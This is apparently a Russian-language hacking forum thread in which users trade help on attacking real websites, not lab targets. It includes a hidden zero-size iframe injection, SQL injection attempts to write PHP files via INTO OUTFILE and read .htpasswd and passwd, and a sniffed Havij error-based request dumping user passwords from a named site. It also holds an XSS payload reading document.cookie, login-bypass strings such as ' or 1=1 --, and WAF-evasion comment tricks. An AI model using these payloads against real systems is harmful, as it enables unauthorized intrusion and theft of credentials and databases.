этот код в php должен быть в php-тегах к примеру PHP: echo "<iframe src='http://site.ru/' width='0' height='0' frameborder='0'></iframe>"; и чтобы не нарушить структуру синтаксиса, html-кода, заменил двойные ковычки на одинарные.
есть sqli, на сервере - root - File_priv=Y - путь /var/www/имясайта/имяфайла (прописан в нескольких местах в бд, я не думаю, что он ложный) - вывод ошибок выключен - mq - off а сама проблема заключается в том, что при заливке into_outfile даже просто не указывая директорию, а прописывая '1.php' к примеру - выкидывает! когда ввожу полный путь - тоже самое. при load_file открывается корневые .htaccess и .htpasswd но их читает пустыми. тоесть поле пустое и ничего вообще не выводится хотя я уверен там хоть 1 строчка но есть когда вбиваю путь до определенного файла сайта - также выкидывает( что это такое и возможно ли решить проблему?
Просто прав не хватает, скорей всего или мускул на другом сервере. Только если ты указываешь файл без пути типа outfile '1.php', то запрос должен сработать и файл 1.php должен создастся в папке с мускулом, на которую права, разумеется, всегда есть. То же самое и для /tmp/. А passwd читается?
Чем слить базы быстрее чем с Havij 1.15 ??? А то так и с ума сойти можно одну базу сливать целый день. И если база больше 5 метров он **** вообще виснет. Кто чем сливает базы большие ? Щас пробую rsaUnDumper_sql__2.0 Перехватил снифером запрос с Havij 1.15 при сливе базы . _http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271 Как его теперь подправить под rsaUnDumper_sql__2.0 ?
хавиж работает с выводом через ошибку..не знаю как rsaUnDumper? если работает то можно..если нет то писать скрип...или же исползовать скрипт от Пашкелы..на форуме найдешь
Нашел Xss в input. Фильтруется < и + Такое работает Code: /?search=test" onBlur ="alert(document.cookie) но дальше пробиться не получается. Подскажите. Вот что имеем на выходе Code: <input type="text" id="id" name="search" value="test" onBlur ="alert(document.cookie)"/>
< и + тут не нужен, весь код помещаем в событие. Как - или пользуемся найденной sql-inj, или ищем что то другое.
Добрый день. Есть логин-форма. При подстановке кавычки в любое из полей выдается: MySQL-Error блаблабла SQL Query: SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс') логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст. Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет SQL Query: SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 -- ') AND (BINARY password = BINARY 'admin' or 1=1 -- ') если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль". Как тут можно в эту BINARY инжектнуться?
Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?
Всем добрый день. Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу... http://powerdefence.ru/Uslugi_dlya_Yur_lic'
Как обойти фаервол / фильтр при проведение SQL-инъекции? Запросы вида: =-1'+order+by+10+--+ =-1'/*--*/order/*--*/by/*--*/10-- =-1'+OrDer+By+10+--+ При всех этих запросах пишет: Соединение было сброшено
2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic') 2 aydin-ka: =-1'/**//*!order*//**//*!by*//**/10--+ Так пробовал? Все зависит от того, где именно происходит фильтрация.
Пробуй GROUP BY или тупо UNION SELECT 1 -- UNION SELECT 1,2 -- UNION SELECT 1,2,3 -- UNION SELECT 1,2,3,......,N -- В оба поля: ' or '1'='1
Если у тебя поиске "Результатов не найдено", это тоже скуль? =/ Вроде бы ясно сказано.. ещё и крутить собрался.. распечатай, и крути, запустить можешь даже.